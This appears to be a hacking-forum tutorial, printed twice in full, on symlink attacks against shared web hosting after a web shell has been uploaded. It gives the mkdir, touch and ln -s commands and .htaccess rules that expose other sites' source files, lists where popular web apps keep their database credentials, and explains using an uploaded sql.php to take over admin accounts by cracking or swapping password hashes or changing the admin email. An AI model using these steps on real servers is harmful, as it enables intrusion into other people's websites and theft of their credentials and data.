#First Method:-
After uploading the shell make a new directory by an option or execute this command:
Quote:
mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:
touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Anyas you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
http://i41.tinypic.com/kaoknd.png
Then, execute this command:
Quote:
ln -s /root
http://i40.tinypic.com/15g9qx4.png
lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
http://f1204.hizliresim.com/w/l/4l6fv.png
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html
#Ofcourse replace =>(user) with the target website user.
u will see something like this;
http://i41.tinypic.com/mr8mrb.png
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:
Quote:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
http://i43.tinypic.com/14abedw.png
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
http://i39.tinypic.com/14jnjfl.png
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php#Finally symlink the target website with this command:
Quote:
ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
http://i40.tinypic.com/14v192q.png
n this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
Hope u Like this.....
credit to $y$tE^M32
After uploading the shell make a new directory by an option or execute this command:
Quote:
mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:
touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Anyas you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
http://i41.tinypic.com/kaoknd.png
Then, execute this command:
Quote:
ln -s /root
http://i40.tinypic.com/15g9qx4.png
lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
http://f1204.hizliresim.com/w/l/4l6fv.png
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html
#Ofcourse replace =>(user) with the target website user.
u will see something like this;
http://i41.tinypic.com/mr8mrb.png
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:
Quote:
vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
http://i43.tinypic.com/14abedw.png
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
http://i39.tinypic.com/14jnjfl.png
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php#Finally symlink the target website with this command:
Quote:
ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
http://i40.tinypic.com/14v192q.png
n this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
Hope u Like this.....
credit to $y$tE^M32
Post a Comment